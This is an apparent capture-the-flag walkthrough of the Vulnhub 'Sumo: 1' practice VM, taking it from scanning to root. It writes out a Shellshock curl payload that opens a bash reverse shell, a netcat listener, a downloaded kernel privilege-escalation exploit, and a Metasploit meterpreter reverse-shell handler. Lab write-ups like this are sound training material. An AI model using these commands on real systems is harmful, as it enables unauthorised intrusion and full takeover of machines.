Sumo Vulnhub Walkthrough | Sumo: 1 Walkthrough Vulnhub | sumo writeup vulnhub
In this Article, we play another vulnhub box sumo is created by SunCSR Team. This VM is Beginner level you can download here sumo: 1 CTF
Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
Network Scanning
First we discover our target IP address using the netdiscover tool.
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netdiscover |
Now we have our target IP address our next step is scanning target machine ports and service using nmap ( -A ) aggressive scan
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nmap -A |
Our target two ports are open 22SSH, and an 80http service running for enumeration we will navigate to a web browser for exploring HTTP service
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now we have no clue what we do then we chose nikto web vulnerability scanner
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nikto --url |
After completing the Nikto scan we found a directory /cgi-bin/test and this directory is vulnerable to the shellshock exploit before execute the curl command first we start our netcat listener
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curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/" 0>&1' " |
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nc -lvp 4545 id |
After execute the curl command we have reverse shell target machine and we try to find suid binary but we fail then we run the uname -r command and this command is shown target machine kernel version
and this kernel version is vulnerable perf_swevent_init’ Local Privilege Escalation move the /tmp directory and download the exploit
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uname -r wget |
then we compile the exploit but we see a error for compiling time gcc: error trying to exec ‘cc1’ : execvp:
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chmod 777 kernal.c gcc kernal.c -02 -o hackNos |
now we have a big problem after compile the exploit our VM is crash again we create an Linux meterpreter reverse payload and using the wget command download this payload target machine /tmp directory
and run the msfconsole and load a plugin multi/handler set Linux meterpreter payload listener
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msfconsole -x "use exploit/multi/handler" set payload linux/x86/meterpreter/reverse_tcp set lhost set lport 4444 run |
our Metasploit listener is start we add permission our payload then execute our payload using the command
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chmod +x paylod.elf && ./payload |
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shell python -c 'import pty;pty.spawn("/bin/bash")' |
again we go to the /tmp directory and recompile the exploit and add permission read,write,execute for all user and run exploit
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gcc kernal.c -02 -o hackNos chmod 777 hackNos && ./hackNos 0 |
our exploit is run successfully and we get root shell target machine so let’s move the /root directory and read our root.txt flag.
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cd /root ls cat root.txt |